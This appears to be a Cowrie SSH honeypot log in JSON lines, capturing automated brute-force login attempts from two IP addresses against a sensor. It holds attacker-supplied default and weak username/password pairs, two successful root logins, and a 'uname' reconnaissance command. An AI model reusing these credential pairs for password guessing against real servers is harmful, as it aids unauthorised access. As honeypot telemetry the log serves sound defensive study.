{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34696,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ec2b94cf349","protocol":"ssh","message":"New connection: 212.227.125.160:34696 (1.2.3.4:22) [session: 2ec2b94cf349]","sensor":"my-vps","timestamp":"2025-08-26T11:45:04.211439Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:45:04.212469Z","src_ip":"212.227.125.160","session":"2ec2b94cf349"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:45:04.556443Z","src_ip":"212.227.125.160","session":"2ec2b94cf349"}
{"eventid":"cowrie.login.failed","username":"opc","password":"123456","message":"login attempt [opc/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:45:04.824236Z","src_ip":"212.227.125.160","session":"2ec2b94cf349"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:05.878471Z","src_ip":"212.227.125.160","session":"2ec2b94cf349"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35468,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5629fec6b2c","protocol":"ssh","message":"New connection: 212.227.125.160:35468 (1.2.3.4:22) [session: f5629fec6b2c]","sensor":"my-vps","timestamp":"2025-08-26T11:45:10.233758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:45:10.234414Z","src_ip":"212.227.125.160","session":"f5629fec6b2c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:45:10.293315Z","src_ip":"212.227.125.160","session":"f5629fec6b2c"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:45:10.452075Z","src_ip":"212.227.125.160","session":"f5629fec6b2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:45:10.607268Z","src_ip":"212.227.125.160","session":"f5629fec6b2c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:45:10.607922Z","src_ip":"212.227.125.160","session":"f5629fec6b2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:10.727094Z","src_ip":"212.227.125.160","session":"f5629fec6b2c"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:10.728120Z","src_ip":"212.227.125.160","session":"f5629fec6b2c"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":60222,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bd774128bf0","protocol":"ssh","message":"New connection: 83.168.105.65:60222 (1.2.3.4:22) [session: 5bd774128bf0]","sensor":"my-vps","timestamp":"2025-08-26T11:45:14.512992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:45:14.513949Z","src_ip":"83.168.105.65","session":"5bd774128bf0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:45:14.550024Z","src_ip":"83.168.105.65","session":"5bd774128bf0"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:45:14.660160Z","src_ip":"83.168.105.65","session":"5bd774128bf0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:15.698159Z","src_ip":"83.168.105.65","session":"5bd774128bf0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36238,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e54d55676b2","protocol":"ssh","message":"New connection: 212.227.125.160:36238 (1.2.3.4:22) [session: 4e54d55676b2]","sensor":"my-vps","timestamp":"2025-08-26T11:45:16.002980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:45:16.003727Z","src_ip":"212.227.125.160","session":"4e54d55676b2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:45:16.629275Z","src_ip":"212.227.125.160","session":"4e54d55676b2"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-26T11:45:16.858647Z","src_ip":"212.227.125.160","session":"4e54d55676b2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:17.931001Z","src_ip":"212.227.125.160","session":"4e54d55676b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37008,"dst_ip":"1.2.3.4","dst_port":22,"session":"07ea71503367","protocol":"ssh","message":"New connection: 212.227.125.160:37008 (1.2.3.4:22) [session: 07ea71503367]","sensor":"my-vps","timestamp":"2025-08-26T11:45:22.101824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:45:22.102722Z","src_ip":"212.227.125.160","session":"07ea71503367"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:45:22.450064Z","src_ip":"212.227.125.160","session":"07ea71503367"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:45:23.837814Z","src_ip":"212.227.125.160","session":"07ea71503367"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:45:24.405472Z","src_ip":"212.227.125.160","session":"07ea71503367"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:45:24.406326Z","src_ip":"212.227.125.160","session":"07ea71503367"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:24.504055Z","src_ip":"212.227.125.160","session":"07ea71503367"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:24.505123Z","src_ip":"212.227.125.160","session":"07ea71503367"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37782,"dst_ip":"1.2.3.4","dst_port":22,"session":"4df6a26381f5","protocol":"ssh","message":"New connection: 212.227.125.160:37782 (1.2.3.4:22) [session: 4df6a26381f5]","sensor":"my-vps","timestamp":"2025-08-26T11:45:29.007888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:45:29.008758Z","src_ip":"212.227.125.160","session":"4df6a26381f5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:45:29.067561Z","src_ip":"212.227.125.160","session":"4df6a26381f5"}
{"eventid":"cowrie.login.failed","username":"lp","password":"lp","message":"login attempt [lp/lp] failed","sensor":"my-vps","timestamp":"2025-08-26T11:45:29.655402Z","src_ip":"212.227.125.160","session":"4df6a26381f5"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":59158,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f3420a7698e","protocol":"ssh","message":"New connection: 83.168.105.65:59158 (1.2.3.4:22) [session: 3f3420a7698e]","sensor":"my-vps","timestamp":"2025-08-26T11:45:29.927702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:45:29.928602Z","src_ip":"83.168.105.65","session":"3f3420a7698e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:45:29.964056Z","src_ip":"83.168.105.65","session":"3f3420a7698e"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer","message":"login attempt [observer/observer] failed","sensor":"my-vps","timestamp":"2025-08-26T11:45:30.108638Z","src_ip":"83.168.105.65","session":"3f3420a7698e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:30.742213Z","src_ip":"212.227.125.160","session":"4df6a26381f5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:31.146612Z","src_ip":"83.168.105.65","session":"3f3420a7698e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38554,"dst_ip":"1.2.3.4","dst_port":22,"session":"930f15bb81ab","protocol":"ssh","message":"New connection: 212.227.125.160:38554 (1.2.3.4:22) [session: 930f15bb81ab]","sensor":"my-vps","timestamp":"2025-08-26T11:45:35.310050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:45:35.311267Z","src_ip":"212.227.125.160","session":"930f15bb81ab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:45:35.361085Z","src_ip":"212.227.125.160","session":"930f15bb81ab"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-26T11:45:35.568120Z","src_ip":"212.227.125.160","session":"930f15bb81ab"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:36.621182Z","src_ip":"212.227.125.160","session":"930f15bb81ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39322,"dst_ip":"1.2.3.4","dst_port":22,"session":"840aad262721","protocol":"ssh","message":"New connection: 212.227.125.160:39322 (1.2.3.4:22) [session: 840aad262721]","sensor":"my-vps","timestamp":"2025-08-26T11:45:40.513797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:45:40.515859Z","src_ip":"212.227.125.160","session":"840aad262721"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:45:40.565425Z","src_ip":"212.227.125.160","session":"840aad262721"}
{"eventid":"cowrie.login.failed","username":"david","password":"david","message":"login attempt [david/david] failed","sensor":"my-vps","timestamp":"2025-08-26T11:45:40.721489Z","src_ip":"212.227.125.160","session":"840aad262721"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:45:41.838501Z","src_ip":"212.227.125.160","session":"840aad262721"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":47684,"dst_ip":"1.2.3.4","dst_port":22,"session":"bddeab4e54bd","protocol":"ssh","message":"New connection: 83.168.105.65:47684 (1.2.3.4:22) [session: bddeab4e54bd]","sensor":"my-vps","timestamp":"2025-08-26T11:45:45.370296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:45:45.371493Z","src_ip":"83.168.105.65","session":"bddeab4e54bd"}
